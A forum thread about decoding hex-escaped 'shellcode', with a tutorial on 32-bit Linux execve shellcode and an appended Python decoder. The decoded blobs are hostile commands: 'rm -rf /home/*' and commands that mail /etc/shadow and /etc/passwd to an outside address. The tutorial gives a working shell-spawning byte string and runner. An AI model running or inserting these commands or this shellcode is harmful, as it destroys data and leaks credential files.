Decoding shellcode?

Questions about programming languages and debugging
ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

Ok, so I experimented with some shellcode yesterday, which resulted in the removal of my home folder... not very amusing, I thought. But I have a routine for how I configure all my programs, so it didn't take that long to recover it all, and no important files were lost.

Now, I know what these codes do, but I am curious how I would decode them; does anyone know? I read something about using unescape() to decode when percent-encoding is used. Anyway... does anyone know how I would decode these three shellcodes?

Code:

\x2f\x62\x69\x6e\x2f\x72\x6d\x20
\x2d\x72\x66\x20\x2f\x68\x6f\x6d
\x65\x2f\x2a\x3b\x63\x6c\x65\x61
\x72\x3b\x65\x63\x68\x6f\x20\x62
\x6c\x34\x63\x6b\x68\x34\x74\x2c
\x68\x65\x68\x65

Code:

\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73
\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69
\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69
\x73\x63\x6c\x6f\x73\x75\x72\x65\x40
\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b
\x2e\x6f\x72\x67\x2e\x75\x6b\x20

Code:

\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70
\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69
\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69
\x73\x63\x6c\x6f\x73\x75\x72\x65\x40
\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b
\x2e\x6f\x72\x67\x2e\x75\x6b\x20

"The best place to hide a tree, is in a forest"

G-Brain
Fame ! Where are the chicks?!
Posts: 467
Joined: 08 Nov 2007, 17:00
Location: NL

Post by G-Brain »

Uh... alert.

Nerdz
The Architect
Posts: 1127
Joined: 15 Jun 2005, 16:00
Location: #db_error in: select usr.location from sucko_member where usr.id=63;

Post by Nerdz »

javasXXcript:alXXert("\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20
\x7c\x6d\x61\x69\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69\x73\x63\x6c\x6f\x73\x75\x72\x65
\x40\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b\x2e\x6f\x72\x67\x2e\x75\x6b\x20")

which is:
cat etc/passwd |mail full-disclosure@lists.grok.org.uk

You can do the same for the rest of your shellcode...

Give a man a fish, you feed him for one day.
Teach a man to fish, you feed him for life.

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

yay! ^^ Thanks Nerdz
"The best place to hide a tree, is in a forest"

Lyecdevf
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
Location: In between life and death.

Post by Lyecdevf »

Yeah, be careful with what you put on your system. Once I had to reinstall because I used something that I did not know what it was.

We will either find a way, or make one.
- Hannibal

bubzuru
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00

Post by bubzuru »

WTF, that won't work with real shellcode lol :lol:
Shellcode is just hexadecimal opcodes.

Take a look at this example:

Code:

/* 32-bit Linux execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80.
   Build with gcc -m32; the asm string must be split per line, the original
   unterminated multi-line literal does not compile. */
int main(void)
{
        __asm__(
                "xorl  %eax, %eax\n\t"      /* eax = 0                          */
                "pushl %eax\n\t"            /* NUL terminator for the path      */
                "pushl $0x68732f2f\n\t"     /* "//sh"                           */
                "pushl $0x6e69622f\n\t"     /* "/bin"                           */
                "movl  %esp, %ebx\n\t"      /* ebx = pointer to "/bin//sh"      */
                "pushl %eax\n\t"            /* argv[1] = NULL                   */
                "pushl %ebx\n\t"            /* argv[0] = path                   */
                "movl  %esp, %ecx\n\t"      /* ecx = argv                       */
                "xorl  %edx, %edx\n\t"      /* edx = envp = NULL                */
                "movb  $0xb, %al\n\t"       /* al = 11 = __NR_execve (not %eax) */
                "int   $0x80"               /* enter the kernel                 */
        );
        return 0;
}

Code:

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>:       push   %ebp
0x8048381 <main+1>:     mov    %esp,%ebp
0x8048383 <main+3>:     xor    %eax,%eax
0x8048385 <main+5>:     push   %eax
0x8048386 <main+6>:     push   $0x68732f2f
0x804838b <main+11>:    push   $0x6e69622f
0x8048390 <main+16>:    mov    %esp,%ebx
0x8048392 <main+18>:    push   %eax
0x8048393 <main+19>:    push   %ebx
0x8048394 <main+20>:    mov    %esp,%ecx
0x8048396 <main+22>:    xor    %edx,%edx
0x8048398 <main+24>:    mov    $0xb,%al
0x804839a <main+26>:    int    $0x80
0x804839c <main+28>:    leave
0x804839d <main+29>:    ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>:     0x31
(gdb) x/bx main+4
0x8048384 <main+4>:     0xc0
(gdb)
0x8048385 <main+5>:     0x50
(gdb)
0x8048386 <main+6>:     0x68
(gdb)
0x8048387 <main+7>:     0x2f
(gdb)
0x8048388 <main+8>:     0x2f
(gdb)
0x8048389 <main+9>:     0x73
(gdb)
0x804838a <main+10>:    0x68
(gdb)
0x804838b <main+11>:    0x68
(gdb)
0x804838c <main+12>:    0x2f
(gdb)
0x804838d <main+13>:    0x62
(gdb)
0x804838e <main+14>:    0x69
(gdb)
0x804838f <main+15>:    0x6e
(gdb)
0x8048390 <main+16>:    0x89
(gdb)
0x8048391 <main+17>:    0xe3
(gdb)
0x8048392 <main+18>:    0x50
(gdb)
0x8048393 <main+19>:    0x53
(gdb)
0x8048394 <main+20>:    0x89
(gdb)
0x8048395 <main+21>:    0xe1
(gdb)
0x8048396 <main+22>:    0x31
(gdb)
0x8048397 <main+23>:    0xd2
(gdb)
0x8048398 <main+24>:    0xb0
(gdb)
0x8048399 <main+25>:    0x0b
(gdb)
0x804839a <main+26>:    0xcd
(gdb)
0x804839b <main+27>:    0x80
(gdb)

Code:

/* The same bytes, copied out of the gdb dump above. Build 32-bit (gcc -m32)
   with the array in executable memory (e.g. -z execstack), otherwise the
   jump into .data faults. */
char sc[] =
        "\x31\xc0"              /* xor  %eax,%eax       */
        "\x50"                  /* push %eax            */
        "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f     */
        "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f     */
        "\x89\xe3"              /* mov  %esp,%ebx       */
        "\x50"                  /* push %eax            */
        "\x53"                  /* push %ebx            */
        "\x89\xe1"              /* mov  %esp,%ecx       */
        "\x31\xd2"              /* xor  %edx,%edx       */
        "\xb0\x0b"              /* mov  $0xb,%al        */
        "\xcd\x80";             /* int  $0x80           */

int main(void)
{
        void (*fp)(void);

        fp = (void (*)(void))sc;  /* treat the byte array as a function */
        fp();                     /* does not return if execve succeeds */
        return 0;
}


http://www.enderunix.org/docs/en/sc-en.txt
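Added example (not from the thread or the enderunix document) covering both ayu's question and bubzuru's point: it decodes a `\xNN` blob without unescape() or eval, reports whether the result is printable text (a shell command, as in the opening post) or raw machine code, and turns `x/bx` lines from a gdb session into the `char sc[]` literal form. The embedded blob and gdb lines are copied from this thread; the function names are my own.

```python
import re
import string

# Decode a "\xNN"-escaped string into raw bytes without unescape() or eval.
def decode_hex_escapes(s: str) -> bytes:
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))

# True when every byte is printable ASCII or whitespace: the "shellcode" is
# then really a shell command string, not machine code.
def looks_like_text(data: bytes) -> bool:
    printable = set(string.printable.encode())
    return len(data) > 0 and all(b in printable for b in data)

# Parse gdb "x/bx main+N" output lines into bytes, ordered by offset from main.
GDB_LINE = re.compile(r"^0x[0-9a-f]+\s+<main\+(\d+)>:\s+0x([0-9a-f]{2})$")

def bytes_from_gdb(dump: str) -> bytes:
    found = {}
    for line in dump.splitlines():
        m = GDB_LINE.match(line.strip())
        if m:
            found[int(m.group(1))] = int(m.group(2), 16)
    return bytes(found[k] for k in sorted(found))

# Render bytes in the char sc[] = "\x31\xc0..." form used by the tutorial.
def to_c_literal(data: bytes) -> str:
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'

# Samples copied from this thread: the third blob of the opening post and
# the first six "x/bx" lines of the gdb session (offsets 3..8).
BLOB = (r"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
        r"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
        r"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
        r"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
        r"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
        r"\x2e\x6f\x72\x67\x2e\x75\x6b\x20")
GDB_DUMP = """\
0x8048383 <main+3>:     0x31
0x8048384 <main+4>:     0xc0
0x8048385 <main+5>:     0x50
0x8048386 <main+6>:     0x68
0x8048387 <main+7>:     0x2f
0x8048388 <main+8>:     0x2f
"""
if __name__ == "__main__":
    data = decode_hex_escapes(BLOB)
    print("text" if looks_like_text(data) else "binary", repr(data))
    code = bytes_from_gdb(GDB_DUMP)
    print("text" if looks_like_text(code) else "binary", to_c_literal(code))
```

Decoding first and looking at the result is what would have saved the home folder: a printable result is a command to read, a non-printable one is code to disassemble, and neither needs to be run to be understood.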
